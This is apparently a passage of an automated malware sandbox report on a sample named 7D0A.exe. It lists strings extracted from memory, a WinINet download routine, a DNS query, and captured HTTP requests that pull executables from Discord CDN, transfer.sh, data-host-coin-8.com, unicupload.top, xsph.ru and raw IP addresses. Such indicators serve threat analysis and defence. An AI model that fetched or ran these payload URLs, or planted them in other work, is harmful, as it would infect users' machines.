                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                          Source: svchost.exe, 00000004.00000002.541242822.000001C48383E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                          Source: svchost.exe, 00000004.00000002.541242822.000001C48383E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                          Source: 7D0A.exe, 00000025.00000002.523953321.0000000002E16000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517387907.0000000003DFA000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.525017087.0000000003BE3000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524467817.0000000002F98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524249981.0000000002ED7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523816698.0000000002D70000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523709480.0000000002D5A000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517036731.0000000003CA7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524574915.0000000002FAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523453991.0000000002C98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524875989.0000000003B72000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517269380.0000000003D89000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517139724.0000000003D18000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: svchost.exe, 00000004.00000002.541242822.000001C48383E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                          Source: 7D0A.exe, 00000019.00000002.437060463.0000000004361000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000000.429672404.0000000000402000.00000040.00000001.sdmp, 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                          Source: svchost.exe, 00000006.00000003.308166834.000001F894E61000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                          Source: svchost.exe, 00000004.00000002.541242822.000001C48383E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                          Source: 7D0A.exe, 00000025.00000002.523953321.0000000002E16000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517387907.0000000003DFA000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.525017087.0000000003BE3000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524467817.0000000002F98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524249981.0000000002ED7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523816698.0000000002D70000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523709480.0000000002D5A000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517036731.0000000003CA7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524574915.0000000002FAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523453991.0000000002C98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524875989.0000000003B72000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517269380.0000000003D89000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517139724.0000000003D18000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: svchost.exe, 00000004.00000002.541242822.000001C48383E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                          Source: svchost.exe, 00000006.00000003.308219719.000001F894E5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                          Source: svchost.exe, 00000006.00000002.309257124.000001F894E5C000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308219719.000001F894E5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                          Source: svchost.exe, 00000006.00000003.308166834.000001F894E61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                          Source: svchost.exe, 00000006.00000002.309190839.000001F894E3C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                          Source: svchost.exe, 00000006.00000002.309257124.000001F894E5C000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308219719.000001F894E5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                          Source: svchost.exe, 00000006.00000003.308076951.000001F894E68000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309305263.000001F894E6A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                          Source: svchost.exe, 00000006.00000003.308166834.000001F894E61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                          Source: svchost.exe, 00000006.00000003.308611585.000001F894E4D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308091317.000001F894E48000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                          Source: svchost.exe, 00000006.00000002.309257124.000001F894E5C000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308219719.000001F894E5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                          Source: svchost.exe, 00000006.00000003.308166834.000001F894E61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                          Source: svchost.exe, 00000006.00000002.309190839.000001F894E3C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                          Source: svchost.exe, 00000006.00000003.308166834.000001F894E61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                          Source: svchost.exe, 00000006.00000003.308166834.000001F894E61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                          Source: svchost.exe, 00000006.00000003.308166834.000001F894E61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                          Source: svchost.exe, 00000006.00000003.285290195.000001F894E30000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                          Source: svchost.exe, 00000006.00000003.308273099.000001F894E40000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309218354.000001F894E42000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308348308.000001F894E41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                          Source: svchost.exe, 00000006.00000003.308273099.000001F894E40000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309218354.000001F894E42000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308348308.000001F894E41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                          Source: svchost.exe, 00000006.00000003.308166834.000001F894E61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                          Source: svchost.exe, 00000006.00000002.309257124.000001F894E5C000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308273099.000001F894E40000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308219719.000001F894E5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                          Source: svchost.exe, 00000012.00000003.378171100.000001994C78D000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.377817839.000001994C77C000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.378193958.000001994C7CE000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                          Source: 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517269380.0000000003D89000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517139724.0000000003D18000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: 7D0A.exe, 00000025.00000002.523953321.0000000002E16000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517387907.0000000003DFA000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.525017087.0000000003BE3000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524467817.0000000002F98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524249981.0000000002ED7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523816698.0000000002D70000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523709480.0000000002D5A000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517036731.0000000003CA7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524574915.0000000002FAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523453991.0000000002C98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524875989.0000000003B72000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517269380.0000000003D89000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517139724.0000000003D18000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: 7D0A.exe, 00000025.00000002.523816698.0000000002D70000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524574915.0000000002FAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab4
                          Source: 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517269380.0000000003D89000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517139724.0000000003D18000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: svchost.exe, 00000006.00000003.308219719.000001F894E5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                          Source: svchost.exe, 00000006.00000002.309257124.000001F894E5C000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308219719.000001F894E5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                          Source: svchost.exe, 00000006.00000003.308219719.000001F894E5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                          Source: svchost.exe, 00000006.00000003.308329739.000001F894E56000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                          Source: svchost.exe, 00000006.00000003.308166834.000001F894E61000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                          Source: svchost.exe, 00000006.00000002.309190839.000001F894E3C000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                          Source: svchost.exe, 00000006.00000003.285290195.000001F894E30000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                          Source: 7D0A.exe, 00000025.00000002.523953321.0000000002E16000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517387907.0000000003DFA000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.525017087.0000000003BE3000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524467817.0000000002F98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524249981.0000000002ED7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523816698.0000000002D70000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523709480.0000000002D5A000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517036731.0000000003CA7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524574915.0000000002FAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523453991.0000000002C98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524875989.0000000003B72000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517269380.0000000003D89000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517139724.0000000003D18000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                          Source: 7D0A.exe, 00000025.00000002.523953321.0000000002E16000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517387907.0000000003DFA000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.525017087.0000000003BE3000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524467817.0000000002F98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524249981.0000000002ED7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523816698.0000000002D70000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523709480.0000000002D5A000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517036731.0000000003CA7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524574915.0000000002FAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523453991.0000000002C98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524875989.0000000003B72000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517269380.0000000003D89000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517139724.0000000003D18000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                          Source: 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                          Source: 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                          Source: 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                          Source: svchost.exe, 00000006.00000002.309190839.000001F894E3C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                          Source: svchost.exe, 00000006.00000002.309190839.000001F894E3C000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309122686.000001F894E13000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                          Source: svchost.exe, 00000006.00000003.285290195.000001F894E30000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                          Source: svchost.exe, 00000006.00000003.308329739.000001F894E56000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                          Source: svchost.exe, 00000006.00000003.285290195.000001F894E30000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                          Source: svchost.exe, 00000006.00000003.285290195.000001F894E30000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308447911.000001F894E2D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309166319.000001F894E2F000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                          Source: svchost.exe, 00000006.00000003.308611585.000001F894E4D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308091317.000001F894E48000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                          Source: svchost.exe, 00000012.00000003.378171100.000001994C78D000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.377817839.000001994C77C000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.378193958.000001994C7CE000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                          Source: svchost.exe, 00000012.00000003.378171100.000001994C78D000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.377817839.000001994C77C000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.378193958.000001994C7CE000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                          Source: 7D0A.exe, 00000025.00000002.523953321.0000000002E16000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517387907.0000000003DFA000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.525017087.0000000003BE3000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524467817.0000000002F98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524249981.0000000002ED7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523816698.0000000002D70000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523709480.0000000002D5A000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517036731.0000000003CA7000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524574915.0000000002FAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523453991.0000000002C98000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524875989.0000000003B72000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517269380.0000000003D89000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000003.517139724.0000000003D18000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: svchost.exe, 00000012.00000003.379191597.000001994C77E000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report
                          Source: svchost.exe, 00000012.00000003.379223670.000001994CC02000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.379136182.000001994C7A6000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.379204449.000001994C78F000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.379191597.000001994C77E000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.379166777.000001994C7A6000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                          Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                          Source: global trafficHTTP traffic detected: GET /32739433.dat?iddqd=1 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.233.81.115
                          Source: global trafficHTTP traffic detected: GET /attachments/903666793514672200/930134152861343815/Nidifying.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                          Source: global trafficHTTP traffic detected: GET /abhF HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: goo.su
                          Source: global trafficHTTP traffic detected: GET /get/QbPlFD/G.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                          Source: global trafficHTTP traffic detected: GET /get/uq3XSe/5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                          Source: global trafficHTTP traffic detected: GET /get/uq3XSe/5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                          Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                          Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: GET /files/9042_1641895079_9876.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
